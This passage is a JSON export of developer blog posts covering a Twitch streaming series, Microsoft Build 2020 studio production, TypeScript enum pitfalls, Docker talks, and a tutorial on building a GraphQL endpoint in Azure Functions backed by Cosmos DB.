ASP.NET Core to Serverless", "content": "I recently started streaming on my Twitch channel and am trying to get into a regular schedule of streaming, so to do that I’m going to kick off a multi-part stream in which we’ll look at porting an ASP.NET Core application to a Serverless application on Azure Functions.\nThe application I’m going to tackle is Blazing Pizza, a workshop from the Blazor team.\nI’ll be streaming every Friday at midday Sydney time (7pm Thursday’s PDT) for anyone who wants to join in. I’m undecided if I’ll do it in C# or F#, but the codebase will end up having both implementations, so I might mix and match between weeks on what is done live and which I do between streams.\nSee you on the stream.\n", "id": "2020-06-20-new-stream-series-server-to-serverless" }, { "title": "Generating TypeScript Types From GraphQL Schemas", "url": "https://www.aaron-powell.com/posts/2020-06-12-generating-typescript-types-from-graphql-schemas/", "date": "Fri, 12 Jun 2020 16:44:27 +1000", "tags": [ "javascript", "typescript", "web", "serverless" ], "description": "A continuation of my live streaming, this time looking at how to generate types from GraphQL.", "content": "Last week I did a live stream on creating a web app with React, TypeScript and GraphQL and there was a question that popped up on whether or not you could generate the TypeScript types from the GraphQL schema, as I was creating them by hand.\nToday, I did a last-minute stream in which I showed how you could do it using GraphQL Code Generator. It was really simple to integrate and what’s more, I found a problem in the types I had written by hand relative to the GraphQL schema, so it’s a win-win. I even showed off how the pull request feature of Static Web Apps works.\n", "id": "2020-06-12-generating-typescript-types-from-graphql-schemas" }, { "title": "Microsoft Build, a Look Back", "url": "https://www.aaron-powell.com/posts/2020-06-04-microsoft-build-a-look-back/", "date": "Thu, 04 Jun 2020 09:52:16 +1000", "tags": [ "speaking", "microsoft" ], "description": "Last week saw Microsoft Build done fully online, but let's talk about how we did it.", "content": "Getting set up for #MSBuild live in the Sydney studio 🤩 pic.twitter.com/3eZdxyDcCS\n— Aaron Powell (@slace) May 19, 2020 Just over a week ago, Microsoft Build was run as a fully online event. This was the first time we’d done a 100% virtual event, but given the global situation, it was the sensibly way to do it.\nIf you didn’t tune in, the format was a 48 hour continuous live stream, consisting of around around 10 different “channels” that you could watch with all sessions delivered live. I was lucky to work with the wonderful Sonia Cuff and Rick Claus to host the APAC edition of the Build News Desk.\nYou can go catch all ~370 sessions from Build on YouTube or go back and relive your favourite memories.\nBut for this post, I want to talk a bit about how we ran the event here in Sydney.\nCreating a Studio In Sydney, we decided to create a “studio” that would be used by myself to do the News Desk duties. This was partly for us to test how we could setup something professional for live streaming, and partly because it was a bit of fun!\nWe setup a studio in the Sydney Microsoft Reactor and cobbled it together with the kit we had available.\nVideo For the camera, we were lucky enough to have access to a high quality streaming camera that we use in the Reactor for events. I’m not really sure what it is, other than it’s big, heavy, expensive and has a massive tripod to mount it on.\nWe had a few redundancy options with the camera, we had a DSLR on hand that could be run on streaming and a high quality webcam. Thankfully, we didn’t have to use them. We didn’t want to have to be swapping out kit on the fly!\nLighting Trying to get our lighting balance right took a lot of work, I had 4 lights dedicated on me (I think I’m still seeing spots 🤣) and another 3 or 4 around the room to help with the ambient light. The ones dedicated to me were key lights, like people use for streaming/home office setup, nothing too fancy, while the others were more photography style light boxes, the sort of thing you’d pick up at a camera store, providing back lighting.\nWhile there was overhead lighting in the room (fluro tubes and down lights), we opted not to use them as they are all on different temperatures and hues, making consistent lighting harder to achieve. You may also notice in the background some fun colours, we did that with some small spotlights to breakup the background and to make it pretty.\nAudio Audio was a bit more fun. We didn’t want the headphones + mic-on-desk look, and given we were online for many hours, headphones can be uncomfortable after a while and anyway, they don’t give that true studio look. So we decided to go with an IFB, which is those things that TV hosts have in their ears (you’ll see the clear spiral behind their ears) for the audio out and a lapel mic for audio in. Again, we had redundancy in the form of headphones and a few on-desk mics, which again we didn’t need to use.\nThe ear piece and lapel were connected to a small recorder which gave us control around level/etc. before sending it via USB to the production team. This meant that we could give the cleanest audio we could and reduce the need for editing/balancing before broadcast.\nA Hosts View of the World Putting the finishing touches on my setup for #MSBuild, who's registered and ready for the event 🤩 pic.twitter.com/rhSwDyHaf1\n— Aaron Powell (@slace) May 18, 2020 That’s right, I had 5 screens that I had in my field of view (only 4 in the photo though), and they were:\nSurface Book 2 on desk directly in front with an external screen This acted as my notes screen for talking to guests and the rough outline of the Q&A we’d agreed upon Surface Pro 4 on the desk to my right For Twitter/moderation tool/back channel chats/etc. Return feed from the camera I like to look at myself all day Surface Studio (we actually moved it to below the camera, not beside, to keep the camera in my eye line) This ran the Microsoft Teams call so I could see who I was talking to There was also a 2nd Surface Pro 4 off to my left and on the floor powering the TV behind me, and it wasn’t something that I used because I couldn’t see it. So all in all I had more screens than I could possibly need, but hey, why not have them everywhere!\nAlso, there was a local production crew in Sydney (in another room) that had like 5 screens to monitor all the comms with our Microsoft Studio production team, based in Redmond.\nProduction and Teams I had a local production team who were there to help is we had technical issues, to keep an eye ear into the Redmond production team and to make sure I was kept plied with snacks, but most of the magic happened in Redmond.\nWe used Teams for the event and each of us dialed into separate calls. From there the Redmond production team took over, working some magic to connect us all together. Because we weren’t in the same Teams call as each other it meant that the production team could talk to us individually, so if I wasn’t properly in frame or we were running over time they could pop in my ear, and only my ear.\nAs a techy, I found this whole setup so cool! I don’t know how it works behind the scenes, but the fact they we were all on separate called but then the same call, I had to hold back on geeking out too much!\nScripts Time to read the script @SoniaCuff and I have for #MSBuild pic.twitter.com/FoLDGJjWTF\n— Aaron Powell (@slace) May 19, 2020 While we tried to make everything seem as natural as possible, we did have a script to follow and keep us on track as much as we could.\nWhen we’re in a session with guests, the host (myself, Sonia, Scott, Damian, Dave and Justin) worked with the guests to create a framework for the conversation. While I can’t speak for the others, I tried to keep them a bit lose so that we could follow interesting threads as we chatted, rather than just step from one bullet point to the next and this worked really well. Since you’re not physically in the same location as the person, it’s really hard to read body language and when you’ve got multiple guests (some who English wasn’t their first language) a rough outline made everyone feel more at ease on where we were going.\nBut with the other parts, when it was Rick, Sonia and myself, we tried to be a bit more structured. This meant that we could ensure we were keeping on message of the important things to do with Build, like talking about our not for profit partners, the programs we were running around Build or talk about upcoming sessions.\nTo make sure that we were all in sync with each other, and that we could make the scripted parts feel natural, we had a number of table reads in which we went through the script as though it was live, then tweaked the wording and flow with our script writers. We also had a full day of rehearsals in which we setup as though we were doing the event (lighting, audio, cameras, etc.) and presented to no one. This was a lot of fun and it help get everyone at ease around how the event would flow and give the confidence that we were going to nail it! Fun fact - the rehearsal was the Monday before Build, so we only just got it in. 🤣\nThe Day(s) Of After a last minute taping down of all the cables (there was A LOT of cables), some final tech checks with the production team, it was go time! Sonia and I had sneakily watched the keynotes before their rebroadcast so we got our notes and talking points sorted so that we could do some hot takes in the first segment (that was all unscripted!) and then it was into sessions with our guests. I got to speak to some amazing people around APAC about lot of different topics (you can see all the session I was involved with here), wrapping up the day by passing over to the UK hosts, and then I went home utterly exhausted. I’ve done big events in the past, lots of talking in a single day, but this was probably the most exhausted I’d been, I was so exhausted in fact that I didn’t even eat any of the fancy cakes my wife had picked up from a chef friend that day (my loss, I ate them the next day and they were good).\nDay 2 was a lot easier (despite the fact I did more content!) and I think a lot of that was the nerves from day 1, the “would this work” and “will the audience respond positively” concerns had all be answered with a resounding yes, it was now time to have fun.\nI’ve done a lot of events in my time and this would rank as one of the most fun events I’ve been apart of. Sure, I missed having the hallway track, I missed seeing the faces of people in the audience, but given that we’re going to be doing a lot more of these kinds of events, I really can’t wait to be part of it.\nFinal Words In the end, nothing really went wrong. I might’ve created a feedback loop by dialing a 2nd device into the call and had production kill my audio, and I might’ve forgotten to come off mute once, but hey, without a few stuff ups you wouldn’t believe it was a live event. My co-hosts were fantastic to work with, we managed to just freestyle a bunch of it without any problems. The Sydney crew was awesome at getting the studio setup (I know nothing when it comes to lighting or cameras so I just sat there looking pretty) and the Redmond production team was so slick to work with and if things were going wrong at their end, I had no idea.\nA huge shout-out to the guests that joined us, we did this on a short timeline and and they all did fantastic jobs.\nWe had a PM team supporting us along the way, finding guests and helping with speaker management, thanks Suzanne Chen, Sarah Thiam and Jack Skinner (Jack also ran Sydney production and did two on-air crosses!) for all the behind the scenes stuff.\nAnd of course to the viewers who dialed in, engaged with our chat and on Twitter. I can’t wait for the next event!\nThe photos and videos in here are from Jack, you can check out the full album on his Flickr.\n", "id": "2020-06-04-microsoft-build-a-look-back" }, { "title": "Building an Azure Static Web App With GraphQL", "url": "https://www.aaron-powell.com/posts/2020-06-03-building-an-azure-static-web-app-with-graphql/", "date": "Wed, 03 Jun 2020 15:58:46 +1000", "tags": [ "javascript", "web", "typescript", "serverless", "azure-functions", "azure" ], "description": "Let's go build something!", "content": "Update: The stream has come and gone, but you’ll find a recording on YouTube and the git repo is also live.\nAt Microsoft Build we launched the preview of a new product, Azure Static Web Apps. This is a product I’ve been wanting for years on Azure as I’ve done a lot of static websites on Azure (see Cutting Azure Costs for DDD Sydney) but they were always been a bit clunky, especially when it comes to integration with a backend. I have it working for some apps, but there’s a lot of infrastructure overhead.\nBut now, with Static Web Apps, it’s a whole lot easier as it’s designed for this by using a combination of static hosting and Azure Functions. We’ve got some fantastic docs (I wrote the Hugo, Gatsby and VuePress docs 😉) that will get you up and running on all things Static Web Apps.\nIt’s one thing to read the docs, and another thing to learn how to actually build something, so at Build I decided to put myself to the test and try to build and deploy an app in ~30 minutes. You’ll find the video in the Microsoft Build YouTube playlist but what you might notice about it is that it’s a lot of copy and pasting of code, and not a lot of actually writing code.\nWell, it’s time to really put my money where my mouth is and go about building the application, and to do that I’m going to try out Twitch and do a live stream of how we can build the app.\nI’m going to kick off at 11.30am (Sydney Time) Friday 5th June, between now and then I’m going to try and work out how to use Twitch, and we’ll see if I can do this without resorting to copy/paste all the time! 🤣\nSo, come join me on Friday and we’ll see if we can’t build this app!\n", "id": "2020-06-03-building-an-azure-static-web-app-with-graphql" }, { "title": "The Dangers of TypeScript Enums", "url": "https://www.aaron-powell.com/posts/2020-05-27-the-dangers-of-typescript-enums/", "date": "Wed, 27 May 2020 16:45:20 +1000", "tags": [ "javascript", "typescript", "web-dev" ], "description": "A few tips on how to use enums in TypeScript, and some gotcha's to watch out for", "content": "TypeScript introduces a lot of new language features that are common in statically type languages, such as classes (which are now part of the JavaScript language), interfaces, generics and union types to name a few.\nBut there’s one special type that we want to discuss today and that is enums. Enum, short for Enumerated Type, is a common language feature of many statically types languages such as C, C#, Java, Swift any many others, is a group of named constant values that you can use within your code.\nLet’s create an enum in TypeScript to represent the days of the week:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday } The enum is denoted using the enum keyword followed by the name of the enum (DayOfWeek) and then we define the constant values that we want to make available for the enum.\nWe could then create a function to determine if it’s the weekend and have the argument that enum:\n1 2 3 4 5 6 7 8 9 10 function isItTheWeekend(day: DayOfWeek) { switch (day) { case DayOfWeek.Sunday: case DayOfWeek.Saturday: return true; default: return false; } } And finally call it like so:\n1 console.log(isItTheWeekend(DayOfWeek.Monday)); // logs 'false' This is a nice way to remove the use of magic values within a codebase since we have a type-safe representation options that are all related together. But things may not always be as they seem, what do you think you get if you pass this through the TypeScript compiler?\n1 console.log(isItTheWeekend(2)); // is this valid? It might surprise you to know that this is valid TypeScript and the compiler will happily take it for you.\nWhy Did This Happen Writing this code may make you think that you’ve uncovered a bug in the TypeScript type system but it turns out that this is intended behaviour for this type of enum. What we’ve done here is created a numeric enum, and if we look at the generated JavaScript it might be a bit clearer:\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 3)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 4)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 5)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 6)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); And if we output it to the console:\nWe’ll notice that the enum is really just a JavaScript object with properties under the hood, it has the named properties we defined and they are assigned a number representing the position in the enum that they exist (Sunday being 0, Saturday being 6), but the object also has number keys with a string value representing the named constant.\nSo, therefore we can pass in numbers to a function that expects an enum, the enum itself is both a number and a defined constant.\nWhen This Is Useful You might be thinking to yourself that this doesn’t seem particularly useful as it really breaks the whole type safe aspect of TypeScript if you can pass in an arbitrary number to a function expecting an enum, so why is it useful?\nLet’s say you have a service which returns a JSON payload when called and you want to model a property of that service as an enum value. In your database you may have this value stored as a number but by defining it as a TypeScript enum we can cast it properly:\n1 const day: DayOfWeek = 3; This explicit cast that’s being done during assignment will turn the day variable from a number to our enum, meaning that we can get a bit more of an understanding of what it represents when it’s being passed around our codebase.\nControlling an Enums Number Since an enum’s member’s number is defined based on the order in which they appear in the enum definition it can be a little opaque as to what the value will be until you inspect the generated code, but that’s something we can control:\n1 2 3 4 enum FileState { Read = 1, Write = 2 } Here’s a new enum that models the state a file could be in, it could be in read or write mode and we’ve explicitly defined the value that corresponds with that mode (I’ve just made up these values, but it could be something coming from our file system).\nNow it is clear what values are valid for this enum as we’ve done that explicitly.\nBit Flags But there’s another reason that this can be useful, and that’s using enums for bit flags. Let’s take our FileState enum from above and add a new state for the file, ReadWrite:\n1 2 3 4 5 enum FileState { Read = 1, Write = 2, ReadWrite = 3 } Then assuming we have a function that takes the enum we can write code such as this:\n1 const file = await getFile("/path/to/file", FileState.Read | FileState.Write); Notice how we’re using the | operator on the FileState enum and this allows us to perform a bitwise operation on them to create a new enum value, in this case it’ll create 3, which is the value of the ReadWrite state. In fact, we can write this in a clearer way:\n1 2 3 4 5 enum FileState { Read = 1, Write = 2, ReadWrite = Read | Write } Now the ReadWrite member isn’t a hand-coded constant, it’s clear that it’s made up as a bitwise operation of other members of the enum.\nWe do have to be careful with using enums this way though, take the following enum:\n1 2 3 4 5 6 7 enum Foo { A = 1, B = 2, C = 3, D = 4, E = 5 } If we were to receive the enum value E (or 5), is that the result of a bitwise operation of Foo.A | Foo.D or Foo.B | Foo.C? So, if there’s an expectation that we are using bitwise enums like this we want to ensure that it will be really obvious how we arrived at that value.\nControlling Indexes We’ve seen that an enum will have a numeric value assigned to it by default or we can explicitly do it on all of them, but we can also do it on a subset of them:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday = 10, Thursday, Friday, Saturday } Here we’ve specified that the value of 10 will represent Wednesday, but everything else will be left “as is”, so what does that generate in JavaScript?\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 10)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 11)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 12)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 13)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); Initially, the values are defined using their position in the index with Sunday through Tuesday being 0 to 2, then when we “reset” the order at Wednesday everything after that is incremented from the new starting position.\nThis can become problematic if we were to do something like this:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday, Monday, Tuesday, Wednesday = 10, Thursday = 2, Friday, Saturday } We’ve made Thursday 2, so what does our generated JavaScript look like?\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek[(DayOfWeek["Sunday"] = 0)] = "Sunday"; DayOfWeek[(DayOfWeek["Monday"] = 1)] = "Monday"; DayOfWeek[(DayOfWeek["Tuesday"] = 2)] = "Tuesday"; DayOfWeek[(DayOfWeek["Wednesday"] = 10)] = "Wednesday"; DayOfWeek[(DayOfWeek["Thursday"] = 2)] = "Thursday"; DayOfWeek[(DayOfWeek["Friday"] = 3)] = "Friday"; DayOfWeek[(DayOfWeek["Saturday"] = 4)] = "Saturday"; })(DayOfWeek || (DayOfWeek = {})); Uh oh, looks like there might be an issue, 2 is both Tuesday and Thursday! If this was a value coming from a data source of some sort, we have some ambiguity in our application. So, if we are going to be setting value it’s better to set all of the values so that it is obvious what they are.\nNon-Numeric Enums So far, we’ve only discussed enums that are numeric or explicitly assigning numbers to enum values, but an enum doesn’t have to be a number value, it can be anything constant or computed value:\n1 2 3 4 5 6 7 8 9 enum DayOfWeek { Sunday = "Sun", Monday = "Mon", Tuesday = "Tues", Wednesday = "Wed", Thursday = "Thurs", Friday = "Fri", Saturday = "Sat" } Here we’ve made a string enum, and the generated code is a lot different:\n1 2 3 4 5 6 7 8 9 10 var DayOfWeek; (function(DayOfWeek) { DayOfWeek["Sunday"] = "Sun"; DayOfWeek["Monday"] = "Mon"; DayOfWeek["Tuesday"] = "Tues"; DayOfWeek["Wednesday"] = "Wed"; DayOfWeek["Thursday"] = "Thurs"; DayOfWeek["Friday"] = "Fri"; DayOfWeek["Saturday"] = "Sat"; })(DayOfWeek || (DayOfWeek = {})); Now we’ll no longer be able to pass in a number to the isItTheWeekend function, since the enum is not numeric, but we also can’t pass in an arbitrary string, since the enum knows what string values are valid.\nThis does introduce another issue though; we can no longer do this:\n1 const day: DayOfWeek = "Mon"; The string isn’t directly assignable to the enum type, instead we have to do an explicit cast:\n1 const day = "Mon" as DayOfWeek; And this can have an impact on how we consume values that are to be used as an enum.\nBut why stop at strings? In fact, we can mix and match the values of enums within an enum itself:\n1 2 3 4 5 6 7 enum Confusing { A, B = 1, C = 1 << 8, D = 1 + 2, E = "Hello World".length } Provided that all assignable values are of the same type (numeric in this case) we can generate those numbers in a bunch of different ways, including computed values, but if they are all constants, we can mix types to make a heterogeneous enum:\n1 2 3 4 5 enum MoreConfusion { A, B = 2, C = "C" } This is quite confusing and can make it difficult to understand how the data works behind the enum, so it’s recommended that you don’t use heterogeneous enums unless you’re really sure it’s what you need.\nConclusion Enums in TypeScript are a very useful addition to the JavaScript language when used properly. They can help make it clear the intent of normally “magic values” (strings or numbers) that may exist in an application and give a type safe view of them. But like any tool in one’s toolbox if they are used incorrectly it can become unclear what they represent and how they are to be used.\nDisclaimer: this blog post was originally written for LogRocket.\n", "id": "2020-05-27-the-dangers-of-typescript-enums" }, { "title": "Microsoft Build Is Coming!", "url": "https://www.aaron-powell.com/posts/2020-05-18-microsoft-build-is-coming/", "date": "Mon, 18 May 2020 16:16:03 +1000", "tags": [ "speaking" ], "description": "Microsoft Build will be coming to you live for 48 hours straight!", "content": "You’ve likely heard the news by now but Microsoft Build, aka #MSBuild, is going to be a virtual event streaming live for 48 hours straight!\nMicrosoft programmer @shanselman is presenting this year at #MSBuild, and would love you to join in.\n⁽ᵂᵉ ʷᵒᵘˡᵈ ᵗᵒᵒ⁾\nRegistration is now open: https://t.co/FzWjhJlBSD pic.twitter.com/vQ54daJfYr\n— Microsoft (@Microsoft) April 30, 2020 As an Australian, this is particularly exciting for me because it means that for the first time I can watch sessions live and jump into the Q&A with the presenter, rather than just watching a recording after the fact. We’ll be able to participate in the sessions without having to get up at 2am!\nWhile there’s going to be many amazing sessions from our product team that you can jump in and watch, the fact that it’s a live event means that we can do a lot of other fun things. One such thing is Sonia Cuff and I get to host the APAC News Desk in which we’ll be streaming for 2 days straight with interviews, panel sessions and demos with some of the folks who work on our products as well as people across our amazing community of MVP’s.\nWe’ve even got a crazy studio setup in the Sydney Microsoft Reactor (Sonia will be in the Microsoft Brisbane office, keep up that social distancing 😉)!\nPutting the finishing touches on my setup for #MSBuild, who's registered and ready for the event 🤩 pic.twitter.com/rhSwDyHaf1\n— Aaron Powell (@slace) May 18, 2020 You can find the full schedule of the News Desk on the agenda list and if you register you can add them to your personalised agenda and even get calendar invites so you don’t miss them!\nI’m also going to be delivering two sessions, one on How to be super productive with Node.js and Visual Studio Code and another on Remote Development with Visual Studio Code.\nSo go, register your free ticket, tweet us what your home office looks like, your pets (#PetsOfBuild), and anything else that gives us an insight into how you’re enjoying the online experience of Build this year. And hey, your tweet might even get featured on our stream!\nWe can’t wait to see you on the stream. 😁\n", "id": "2020-05-18-microsoft-build-is-coming" }, { "title": "Docker, FROM scratch, video edition", "url": "https://www.aaron-powell.com/posts/2020-04-24-docker-from-scratch/", "date": "Fri, 24 Apr 2020 15:46:43 +1000", "tags": [ "docker" ], "description": "Want to go from zero to hero with Docker? This will get you up and running in no time.", "content": "Over the years I’ve given many talks, but there’s one talk that I’ve gone back to time and time again because I not only really enjoy giving it, but it’s always really well received, and that’s my talk Docker, FROM scratch.\nThe premise behind the talk is simple, we start with zero knowledge of Docker and go through 14 exercises, building on each other, to look at use cases for Docker and then how to apply them. All the exercises are on my GitHub as separate tags, with a run.sh/run.bat script in the root to execute the step.\nAnd what’s more exciting is now you can watch it online as a talk I gave as part of the Microsoft Reactor Virtual Learn at Lunch sessions.\nSo grab a beverage, open up a terminal and let’s learn Docker together!\n", "id": "2020-04-24-docker,-from-scratch" }, { "title": "A Walk Through of My Terminal Setup", "url": "https://www.aaron-powell.com/posts/2020-04-24-a-walk-through-of-my-terminal-setup/", "date": "Fri, 24 Apr 2020 11:05:11 +1000", "tags": [ "random" ], "description": "A few videos showing how I configured my terminal for WSL2", "content": "Recently, I blogged about how I setup a Windows dev environment in which I talked about some of the specific tools I install to get things working on both PowerShell and WSL2.\nOn the back of it I was asked if I could show it off in action so I did a couple of quick videos where I walk through some of the setup that I have.\nWSL2 + VS Code In this video I show off the basics of how I setup and use tmux, which is a terminal multiplexer. Basically, this allows me to do a lot of really powerful things from the terminal such as split panes, run nested windows (kind of like tabs) and show some useful information about my machine. I also off the VS Code Remote WSL extension which I use to do the majority of my work.\ntmux URL View Plugin I did this video mainly because I was finding a particular tmux plugin, urlview, so amazingly productive I just had to show it off. The plugin scans the terminal output for URLs and then will give you a list of them to launch into a browser (which I configure to be MS Edge back in Windows). I find it super handy if you’re working with forks of GitHub repos as I can, with a few keystrokes, launch into the ‘New Pull Request’ screen one I push changes to my fork!\nWrap Up Like many of us, I’m starting to play around with streaming and other forms of “snackable” video content, so if there’s anything you’ve been wondering about how I do dev, or any tools you’ve seen my show off in presentations that you want to know more about, do reach out and let me know as I’m happy to throw together a video that covers it off.\n", "id": "2020-04-24-a-walk-through-of-my-terminal-setup" }, { "title": "Using GraphQL in Azure Functions to Access Cosmos DB", "url": "https://www.aaron-powell.com/posts/2020-04-07-using-graphql-in-azure-functions-to-access-cosmosdb/", "date": "Tue, 07 Apr 2020 15:05:12 +1000", "tags": [ "serverless", "azure-functions", "azure" ], "description": "A quick start on how to create a GraphQL endpoint on an Azure Function", "content": "I’m playing around with a new project in which I want to use Azure Functions as the backend to a React UI and figured that it was finally time to learn that newfangled “GraphQL” (also, it’ll get Rob Crowley off my back as he’s bugged me about learning it for years! 😝).\nFor the project I’m building I plan to use Cosmos DB as the backing store, especially since there is a free tier now, so let have a look how we can connect all three of these things together, GraphQL, Azure Functions and Cosmos DB.\nNote: For the purposes of this article I’m going to assume you are familiar with GraphQL and I won’t go over the semantics of it, just the stuff that relates to what we need to do.\nGraphQL + Azure Functions To use GraphQL we’ll need a server and that’s what Azure Functions is going to be. After doing some research I found that Apollo has an integration with Azure Functions, so that’ll give us a nice starting point.\nCreating Our GraphQL Server First thing we’ll do is create the Azure Functions project with a Http Trigger. Jump over to the command line and let’s create that (or use VS/VSCode, up to you):\n1 2 3 func init graphql-functions --worker-runtime node --language typescript cd graphql-functions func new --template "Http Trigger" --name graphql This will scaffold up a TypeScript Azure Functions project and then setup a HTTP trigger that will be where our GraphQL server will be.\nNote: If you want to use ‘plain old JavaScript’ rather than TypeScript just drop the --language flag from func init.\nNow, we need to add the Apollo server integration for Azure Functions, which we can do with npm:\n1 npm install --save apollo-server-azure-functions With the dependencies setup, let’s start implementing the endpoint.\nImplementing a GraphQL Endpoint Open up an editor (such as VS Code) and open graphql/index.ts. You’ll see the boilerplate code for the HTTP Trigger, let’s delete it all so we can start from scratch. While this is a HTTP Trigger as far as Azure Functions is concerned we’re going to be hiding that away behind Apollo, so we’ll start by importing the Apollo Server and GraphQL tools:\n1 import { ApolloServer, gql } from "apollo-server-azure-functions"; Then, we can define a basic schema:\n1 2 3 4 5 const typeDefs = gql` type Query { helloWorld: String! } `; Create a resolver:\n1 2 3 4 5 6 7 const resolvers = { Query: { helloWorld() { return "Hello world!"; } } }; And lastly, export the handler for Azure Functions to call:\n1 2 const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); Our index.ts should now look like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import { ApolloServer, gql } from "apollo-server-azure-functions"; const typeDefs = gql` type Query { helloWorld: String! } `; const resolvers = { Query: { helloWorld() { return "Hello world!"; } } }; const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); But before we can run it there’s one final step, open up the function.json and change the name of the http out binding to $return, making the functions.json look like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "bindings": [ { "authLevel": "function", "type": "httpTrigger", "direction": "in", "name": "req", "methods": ["get", "post"] }, { "type": "http", "direction": "out", "name": "$return" } ], "scriptFile": "../dist/graphql/index.js" } This is required as Apollo will return the value to Azure Functions rather than using a passed in argument that you set the body on. My guess is so that they don’t have to have too much tying the core to how Azure Functions works.\nLaunch the Functions (F5 in VS Code or npm start from the CLI) and navigate to http://localhost:7071/api/graphql where you’ll find the GraphQL playground. Type in your query, execute the query and tada, we have results!\nDisabling the Playground We probably don’t want the Playground shipping to production, so we’d need to disable that. That’s done by setting the playground property of the ApolloServer options to false. For that we can use an environment variable (and set it in the appropriate configs):\n1 2 3 4 5 const server = new ApolloServer({ typeDefs, resolvers, playground: process.env.NODE_ENV === "development" }); Adding Cosmos DB Given that we’ve proven that we can integrate GraphQL with Azure Functions we can now start to do something more realistic than returning hello world, and for that we’ll talk to Cosmos DB. Functions has bindings to Cosmos DB but as we’re going to be doing some dynamic queries we’ll manage the connection ourselves rather than doing automated bindings, and for that we’ll loosely follow the Cosmos DB tutorial on docs.\nNote: If you don’t want to spin up a resource in Azure you can use the Cosmos DB emulator.\nStart by adding the Node module for Cosmos DB:\n1 npm install --save @azure/cosmos Then it’s time to update our Function to use it, so back to index.ts and import CosmosClient:\n1 import { CosmosClient } from "@azure/cosmos"; With this we can create the connection to Cosmos DB:\n1 const client = new CosmosClient(process.env.CosmosKey); Since, we don’t want to commit our Cosmos DB connection string to source control I’m expecting it to be passed in via the AppSettings (when deployed) or local.settings.json locally.\nAside: I’ve decide to cheat when it comes to making the Cosmos DB, I’m using the database from www.theurlist.com which was created by some colleagues of mine. You can learn how to create it yourself, see how they migrated to Cosmos DB Free Tier and grab the code yourself. But feel free to use any Cosmos DB you want, just model the GraphQL schema appropriately.\nChanging Our Query So far our GraphQL query has been just a silly static one, but we want to model our actual Cosmos DB backend, or at least, what of the backend we want to expose, so it’s time to update the schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 const typeDefs = gql` type Record { id: ID userId: String vanityUrl: String! description: String links: [Link] } type Link { id: String url: String! title: String! description: String image: String } type Query { getByVanityUrl(vanity: String): Record getForUser(userId: String): [Record]! } `; And it’s time to implement said schema:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 const resolvers = { Query: { async getByVanityUrl(_, { vanity }: { vanity: string }) { let results = await client .database("linkylinkdb") .container("linkbundles") .items.query({ query: "SELECT * FROM c WHERE c.vanityUrl = @vanity", parameters: [ { name: "@vanity", value: vanity } ] }) .fetchAll(); if (results.resources.length > 0) { return results.resources[0]; } return null; }, async getForUser(_, { userId }: { userId: string }) { let results = await client .database("linkylinkdb") .container("linkbundles") .items.query({ query: "SELECT * FROM c WHERE c.userId = @userId", parameters: [ { name: "@userId", value: userId } ] }) .fetchAll(); return results.resources; } } }; With these changes done we can restart the Functions host and open up the Playground again to try a more complex query.\nConclusion And there we go, we’ve created a GraphQL server that is running inside an Azure Function, talking to Cosmos DB. One thing to be aware of, at least in the way that I’ve approached it, is that we’re potentially pulling more data back from Cosmos DB than we need through our SELECT statement, since the client can choose to drop fields that they don’t need in the response. If this is a concern you could take a look into selection set of the query and dynamically build the SQL statement, but that could be risky, so it’d be something you want to test and optimise for, rather than doing upfront.\nUltimately, I hope that this gets you started in doing GraphQL in Azure Functions. 😊\n", "id": "2020-04-07-using-graphql-in-azure-functions-to-access-cosmosdb" }, { "title": "Getting Started Learning Docker", "url": "https://www.aaron-powell.com/posts/2020-04-06-getting-started-learning-docker/", "date": "Mon, 06 Apr 2020 09:23:39 +1000", "tags": [ "docker" ], "description": "Do you want to learn Docker? Check out this session I ran recently", "content": "Docker is a really useful tool in ones toolbox but when you’re first trying to get started in understanding its role it can be quite hard, there’s so many new terms to learn, different technologies that fit around the edge of the ecosystem and a lot of content focuses on the advanced (and very useful) applications of it.\nBut what do you do when you’re first getting started? I found myself in that situation when I was consulting to a company so I decided to put together a talk that covers everything from the basics up to some common use cases.\nI gave this talk last week as part of the Microsoft Reactor virtual programming and you’ll find it online.\nThere’s also a companion workshop that you can follow along with on my GitHub. Happy containerising!\n", "id": "2020-04-06-getting-started-learning-docker" }, { "title": "How I Setup a Windows Dev Environment", "url": "https://www.aaron-powell.com/posts/2020-03-25-how-i-setup-a-windows-dev-environment/", "date": "Wed, 25 Mar 2020 14:08:06 +1100", "tags": [ "random" ], "description": "I get asked occasionally how I setup my machine, so here we are", "content": "Earlier this year I was tagged into a Twitter thread by Amy Kapernick of someone looking to setup a dev environment on Windows:\nDev'ing on a windows computer for the first time ever. I need some advice peeps, how do I make this a good experience instead of being in a state of constant 